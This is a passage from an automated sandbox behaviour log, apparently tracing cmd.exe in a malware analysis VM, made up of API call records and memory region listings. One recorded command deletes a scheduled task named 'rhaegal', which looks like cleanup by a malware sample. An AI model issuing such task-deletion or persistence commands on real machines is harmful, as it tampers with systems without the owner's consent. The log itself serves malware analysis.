returned 14 [0015.410] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0015.410] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0015.410] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0015.410] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0015.410] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0015.410] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0015.410] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0015.410] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0015.410] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0015.410] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0015.410] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0015.410] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0015.410] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0015.410] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0015.410] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0015.410] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0015.410] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0015.410] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0015.410] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0015.410] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0015.410] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0015.410] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0015.410] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0015.410] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0015.410] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0015.410] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0015.410] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0015.410] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0015.410] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0015.410] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0015.410] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0015.410] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0015.410] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0015.410] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0015.410] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0015.410] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0015.411] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0015.411] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0015.411] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0015.411] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0015.411] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0015.411] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0015.411] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0015.411] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0015.411] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0015.411] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0015.411] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0015.411] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0015.411] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0015.411] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0015.411] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0015.411] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0015.411] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0015.411] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0015.411] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0015.411] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0015.411] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0015.411] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0015.411] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0015.411] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0015.411] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0015.411] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0015.411] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0015.411] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0015.411] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0015.411] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0015.411] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0015.411] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0015.411] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0015.411] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0015.411] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0015.411] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0015.411] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0015.411] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0015.411] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0015.411] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0015.411] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0015.411] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0015.411] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0015.412] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0015.412] SetErrorMode (uMode=0x0) returned 0x8001 [0015.412] SetErrorMode (uMode=0x1) returned 0x0 [0015.412] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d07f8, lpFilePart=0x1af340 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af340*="Desktop") returned 0x25 [0015.412] SetErrorMode (uMode=0x8001) returned 0x1 [0015.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0015.412] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0015.416] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0015.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0015.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1af0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0bc) returned 0xffffffff [0015.417] GetLastError () returned 0x2 [0015.417] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks", fInfoLevelId=0x1, lpFindFileData=0x1af0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0bc) returned 0xffffffff [0015.417] GetLastError () returned 0x2 [0015.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0015.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1af0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0bc) returned 0x4e3478 [0015.417] FindClose (in: hFindFile=0x4e3478 | out: hFindFile=0x4e3478) returned 1 [0015.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x1af0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0bc) returned 0xffffffff [0015.418] GetLastError () returned 0x2 [0015.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0bc) returned 0x4e3478 [0015.418] FindClose (in: hFindFile=0x4e3478 | out: hFindFile=0x4e3478) returned 1 [0015.418] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0015.418] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0015.418] GetConsoleTitleW (in: lpConsoleTitle=0x1af5b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0015.418] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af43c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af504 | out: lpAttributeList=0x1af43c, lpSize=0x1af504) returned 1 [0015.418] UpdateProcThreadAttribute (in: lpAttributeList=0x1af43c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af4fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af43c, lpPreviousValue=0x0) returned 1 [0015.418] GetStartupInfoW (in: lpStartupInfo=0x1af3f8 | out: lpStartupInfo=0x1af3f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0015.418] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0015.419] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0015.419] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0015.420] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Delete /F /TN rhaegal", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1af498*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Delete /F /TN rhaegal", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af4e4 | out: lpCommandLine="schtasks /Delete /F /TN rhaegal", lpProcessInformation=0x1af4e4*(hProcess=0x78, hThread=0x74, dwProcessId=0x988, dwThreadId=0x98c)) returned 1 [0015.425] CloseHandle (hObject=0x74) returned 1 [0015.425] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0015.425] GetEnvironmentStringsW () returned 0x4e5ec0* [0015.425] FreeEnvironmentStringsW (penv=0x4e5ec0) returned 1 [0015.425] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0015.615] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1af3d8 | out: lpExitCode=0x1af3d8*=0x1) returned 1 [0015.615] CloseHandle (hObject=0x78) returned 1 [0015.615] _vsnwprintf (in: _Buffer=0x1af520, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af3e4 | out: _Buffer="00000001") returned 8 [0015.615] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0015.615] GetEnvironmentStringsW () returned 0x4e4080* [0015.615] FreeEnvironmentStringsW (penv=0x4e4080) returned 1 [0015.615] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0015.615] GetEnvironmentStringsW () returned 0x4e4080* [0015.615] FreeEnvironmentStringsW (penv=0x4e4080) returned 1 [0015.616] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af43c | out: lpAttributeList=0x1af43c) [0015.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0015.616] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0015.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0015.616] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5c41ac | out: lpMode=0x4a5c41ac) returned 1 [0015.616] _get_osfhandle (_FileHandle=0) returned 0x3 [0015.616] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5c41b0 | out: lpMode=0x4a5c41b0) returned 1 [0015.616] SetConsoleInputExeNameW () returned 0x1 [0015.616] GetConsoleOutputCP () returned 0x1b5 [0015.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5c4260 | out: lpCPInfo=0x4a5c4260) returned 1 [0015.616] SetThreadUILanguage (LangId=0x0) returned 0x409 [0015.616] exit (_Code=1) Process: id = "4" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x61f66000" os_pid = "0x988" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x974" cmd_line = "schtasks /Delete /F /TN rhaegal" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 454 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 455 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 456 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 457 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 458 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 459 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 460 start_va = 0x250000 end_va = 0x27dfff entry_point = 0x250000 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 461 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 462 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 463 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 464 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 465 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 466 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 467 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 468 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 469 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 470 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 471 start_va = 0x160000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 472 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 473 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 474 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 475 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 476 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 477 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 478 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 479 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 480 start_va = 0x74810000 end_va = 0x74818fff entry_point = 0x74810000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll") Region: id = 481 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 482 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 483 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 484 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 485 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 486 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 487 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 488 start_va = 0x75fe0000 end_va = 0x7606efff entry_point = 0x75fe0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 489 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76089ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 490 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 491 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 492 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 493 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 494 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x7675ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 495 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 496 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 497 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 498 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 499 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 500 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 501 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 502 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 503 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 504 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 505 start_va = 0x80000 end_va = 0x91fff entry_point = 0x80000 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 506 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 507 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 508 start_va = 0x610000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 509 start_va = 0x7a0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 510 start_va = 0x74800000 end_va = 0x74808fff entry_point = 0x74800000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 511 start_va = 0x1ba0000 end_va = 0x1e6efff entry_point = 0x1ba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 512 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 